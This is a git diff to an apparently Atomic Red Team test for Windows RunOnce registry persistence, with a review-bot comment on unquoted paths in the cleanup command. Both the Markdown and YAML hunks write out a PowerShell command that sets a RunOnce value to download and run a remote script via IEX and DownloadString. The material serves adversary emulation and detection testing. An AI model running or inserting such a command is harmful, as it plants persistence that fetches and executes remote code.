diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md
index a987a698..2bd52117 100644
--- a/atomics/T1060/T1060.md
+++ b/atomics/T1060/T1060.md
@@ -114,17 +114,18 @@ RunOnce Key Persistence via PowerShell
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | thing_to_execute | Thing to Run | Path | powershell.exe|
+| reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce|
-#### Attack Commands: Run with `powershell`!
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
 ```
-$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+$RunOnceKey = "#{reg_key_path}"
 set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
 ```
 #### Cleanup Commands:
 ```
-Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore
+Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
 ```
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 45048ccd..175a21dc 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
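Review bot: The new cleanup line `Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore` interpolates the key path unquoted, while the attack command quotes it (`$RunOnceKey = "#{reg_key_path}"`); a supplied path containing a space would be split by PowerShell into separate arguments, and because of `-ErrorAction Ignore` the failure is silent, leaving the RunOnce value in place after the test. Quote it to match the attack command: `Remove-ItemProperty -Path "#{reg_key_path}" -Name "NextRun" -Force -ErrorAction Ignore`. The same unquoted interpolation is in the `cleanup_command` of the atomics/index.yaml hunk below. The default HKLM path contains no spaces, so the default case is unaffected. If this Markdown file and index.yaml are generated from the test's own YAML definition, as the repository layout suggests, the fix belongs in that source file so a regeneration does not undo it.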
@@ -3785,13 +3785,18 @@ persistence: description: Thing to Run type: Path default: powershell.exe + reg_key_path: + description: Path to registry key to update + type: Path + default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce executor: name: powershell + elevation_required: true command: | - $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" + $RunOnceKey = "#{reg_key_path}" set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' - cleanup_command: 'Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force - -ErrorAction Ignore + cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" + -Force -ErrorAction Ignore ' T1053: